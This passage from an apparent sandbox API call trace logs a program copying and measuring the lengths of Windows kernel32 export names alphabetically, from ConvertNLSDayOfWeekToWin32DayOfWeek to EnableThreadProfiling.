[0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.390] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.390] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.390] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.391] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.391] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.391] lstrlenA (lpString="COPYFILEA") returned 9 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.391] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.391] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.391] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.391] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.391] lstrlenA (lpString="COPYFILEW") returned 9 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.391] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.391] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.391] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.391] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.391] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.391] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.391] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.391] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.391] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.391] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.391] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.392] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.392] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.392] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.392] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.392] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.392] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.392] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.392] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.392] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.392] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.392] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.392] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.392] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.392] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.392] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.392] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.392] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.392] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.393] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.393] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.393] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.393] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.393] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.393] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.393] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.393] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.393] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.393] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.393] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.393] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.393] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.393] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.393] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.393] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.393] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.393] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.394] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.394] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.394] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.394] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.394] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.394] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.394] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.394] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.394] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.394] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.394] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.394] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.394] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.394] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.394] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.394] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.394] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.394] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.394] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.395] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.395] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.395] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.395] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.395] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.395] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.395] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.395] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.395] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.395] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.395] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.395] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.395] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.395] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.395] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.395] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.396] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.396] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.396] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.396] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.396] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.396] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.396] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.396] lstrlenA (lpString="DELETEATOM") returned 10 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.396] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.396] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.396] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.396] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.396] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.396] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.396] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.396] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.397] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.397] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.397] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.397] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.397] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.397] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.397] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.397] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.397] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.397] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.397] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.397] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.397] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.397] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.397] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.397] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.397] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.397] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.397] lstrcpyA (in: 